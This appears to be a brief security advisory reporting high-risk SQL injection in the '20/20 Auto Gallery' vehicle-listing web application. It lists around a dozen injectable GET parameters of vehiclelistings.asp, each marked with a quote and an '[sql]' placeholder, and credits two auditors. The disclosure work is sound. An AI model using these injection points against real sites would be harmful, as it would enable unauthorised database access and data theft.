vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='[sql] http://site.com/vehiclelistings.asp?categoryID_list='[sql] http://site.com/vehiclelistings.asp?sale_type='[sql] http://site.com/vehiclelistings.asp?sale_type=&categoryID_list='[sql] http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_numb er='[sql] http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufact urer='[sql] http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufact urer=&model='[sql] http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_numb er=&vehicleID='[sql] http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufact urer=&model=&year='[sql] http://site.com/vehiclelistings.asp?trKeywords=123&boolean=OR&stock_numb er=&vehicleID=&vin='[sql] http://site.com/vehiclelistings.asp?sale_type=&categoryID_list=&manufact urer=&model=&year=&listing_price='[sql] laurent gaffi & benjamin moss http://s-a-p.ca/ contact: saps.audit (at) gmail (dot) com [email concealed]